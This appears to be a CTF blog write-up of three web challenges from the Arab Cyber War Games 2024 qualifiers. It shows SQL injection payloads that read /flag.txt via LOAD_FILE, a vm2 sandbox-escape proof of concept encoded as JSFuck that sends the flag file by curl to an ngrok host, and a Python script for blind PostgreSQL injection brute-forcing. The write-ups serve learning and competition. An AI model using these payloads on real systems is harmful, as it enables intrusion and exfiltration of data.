Web: unmasked

Description You need to read the flag stored in /flag.txt Solution When we start the challange we will see this login page and register page After examining the register page i tried to register an account with username = admin and i got error as the name is used before The interesting part the i get the query in the response in case of error This response gave me interesting information about the query. We knew it’s INSERT query and we knew how the parameters we provide are put into this query. i created a normal user account and logged in to see the next page and i found an upload page. There’s many interesting notes in this page like The userId The email of the user is reflected in page I tried to upload different files(php files, images, etc) but there’s no way to access them I guessed there’s a directory for uploads at /uploads and this was true but i got status code 403 forbidden Anyway i went back to register and my main goal was to get access on admin’s account I thought i can get access to more resources by getting access on admin’s account. I made sure that username is vulnerable to sqli and from errors I knew it’s MariaDB database. After Thinking and attempts i reached to the idea of using stacked queries in this sequence Insert Update Insert I tried this username=admin1','y@g.c','8870b2ae75733c08f557a6333e1aa7502ca50541');UPDATE+users+SET+password+%3d+'8870b2ae75733c08f557a6333e1aa7502ca50541'+WHERE+username+=+'admin';+INSERT+INTO+users(username,+email,+password)+VALUES+('kakashi2&email=adminqqq%40admin.com&password=admin By using this payload i though i’ll be able to insert a user whose name is admin1 and update the password of admin and insert another user whose name is kakashi2 but i got this error.. Actually, I couldn’t solve it so i tried a different approache which is SSTI in email parameter but also no interesting output. I read the challange again and found that we just need to read /flag.txt After searching i found that there’s a function called LOAD_FILE(file path) in MariaDB here. I used it to load /flag.txt in email parameter and this because email parameter is reflected in the next page so we can see the file in that page. I modified the payload to be this username=admin3',LOAD_FILE('/flag.txt'),'8870b2ae75733c08f557a6333e1aa7502ca50541')#;&email=adminqqq%40admin.com&password=admin Then login using this account AND ….. GG !!!

CTF · 2024-08-03

Web: secure calc

Description This site is secure and sandboxed. Solution When we start the challange we will find the source code which is a NodeJS express site and it’s a small app as you see const express = require("express"); const {VM} = require("vm2"); const app = express(); const vm = new VM(); app.use(express.json()); app.get('/', function (req, res) { return res.send("Hello, just index : )"); }); app.post('/calc',async function (req, res) { let { eqn } = req.body; if (!eqn) { return res.status(400).json({ 'Error': 'Please provide the equation' }); } else if (eqn.match(/[a-zA-Z]/)) { return res.status(400).json({ 'Error': 'Invalid Format' }); } try { result = await vm.run(eqn); res.send(200,result); } catch (e) { console.log(e); return res.status(400).json({ 'Error': 'Syntax error, please check your equation' }); } }); app.listen(3000,'0.0.0.0',function(){ console.log("Started !") }); We see const {VM} = require("vm2");, I searched for it and i knew the version from package.json file attached ith the challange and the version was "vm2": "^3.9.19". It’s vulnerable to sandbox escaping and the poc is in this article. We see that the code executed is passed to vm.run(code) function and we have this function in the code of the challange. When we examine /calc endpoint we see that it’s an endpoint for solving equations and we will find 4 steps: checking if there’s a data in the request body (this data will be in json format) data is passed to regex checker to make sure that the data in the request body doesn’t contain any characters vm.run(code) at which the equation will be solved or our code will be executed and it’s our goal syntax error if there is any error from vm.run(code) I have the CVE POC code so i can escape the sandbox but the problem is in bypassing regex. When i send a normal data without any alphabetical characters i get the result of the equation like this When i try sending any characters i get "Error":"Invalid Format" after many attempts i got an error in the syntax that told me json.parse is used This made me to think about prototype pollution I tried { "__proto__": { "eqn": "1+2" } } but it couldn’t detect that it’s an equation. I tried many encoding algorithms like unicode but didn’t work. After many attempts i found the suitable encoding way it’s JSFuck because it consists of symbols only so it will work I used this payload async function fn() { (function stack() { new Error().stack; stack(); })(); } p = fn(); p.constructor = { [Symbol.species]: class FakePromise { constructor(executor) { executor( (x) => x, (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://ngrokIP:ngrokport'); } ) } } }; p.then(); and converted it to JSFuck using any online converter and send that request The curl command worked well Now let’s read the flag but making the command to be curl -X POST --data-binary "@/flag.txt" http://ngrokIP:port convert it and send the request like we did before AND .. GG !!

CTF · 2024-08-03

Web: real

Description A BBH got a vulnerability in this site but the triager needs POC, The flag will be the db username in UPPERCASE and there’s rate limit (1 request per second) solution When we start the challange we will see this login page It’s a very very simple page and during my first attempts i noticed that the output can be: welcome (status code 200) and this occurs when the login is done successfully error (status code 400) and this occurs when the login is failed (wrong creds or wrong syntax) filtered and this occurs when using symbols or words which are forbidden when i tried username=admin%27--&password=a i got welcome in response like this we got the injection point and i see it’s a blind sqli. I was tring to retrieve the data from the tables but there’s misunderstanding. I thought he wants a different user in the same table but it wants the username of the db which is the user connected to database. and this misunderstanding made me take too much time as i want to get data from users table and the () were filtered, so i was in a rabbit hole. After noticing that we need the db user i starting thinking in a different way. I want to know the type of data base. I noticed that the database accepts -- as comment and refuse # and after asking chatgpt i knew that my database now can be Oracle or Postgresql After searching about differences i found that there’s a table called all_tables in oracle corresponds to information_schema.tables in postgresql. I made sure that the db is postgresql using these parameters username=admin%27union%20select%20null,null%20from%20information_schema.tables--&password=a and got welcome in the response. Now i want to get the postgres dbusername. After searching i found that to get it we use select current_user There may be other ways but this worked with me and was very simple. Now i want to inject it in the username parameter and this can be done by admin' and current_user like 'A%'-- this will return welcome if the first character in the current_user is A. but the problem here is like is filtered, so after asking chatgpt i found an alternative which is admin' and current_user ~ '^A'-- and it has the same functionality. We should run the same query for all possible characters and for the length of the username. I created this script to do this job import requests import time import urllib3 urllib3.disable_warnings() # Base URL and target endpoint url = "https://real.ascwg-challs.app/login" # Headers for the request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://real.ascwg-challs.app", "Referer": "https://real.ascwg-challs.app/", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Priority": "u=0, i", "Te": "trailers" } # Characters to iterate over characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_0123456789!@#%^&*()-=_+[]{}|;:',.<>?/`~\"\\abcdefghijklmnopqrstuvwxyz" # Base injection point base_injection = "admin'AND CURRENT_USER ~ '^" password = "a" def bruteforce(): # Initialize the discovered prefix prefix = "" # Try to find each character of the username while True: for char in characters: # Replace the placeholder §u§ with the current prefix + char current = prefix + char injection = base_injection+current+'\'--' data = f"username={injection}&password={password}" # Send POST request response = requests.post(url, headers=headers, data=data, verify=False) # Wait for 1 second to respect the rate limit time.sleep(1) # Check for a successful response if response.status_code == 200: prefix += char print(f"Found: {prefix}") break # Move to the next character if __name__ == "__main__": bruteforce() And .. GG !!

CTF · 2024-08-03

0xk4k45h1

Contact

Arab Cyber War Games Qualifications 2024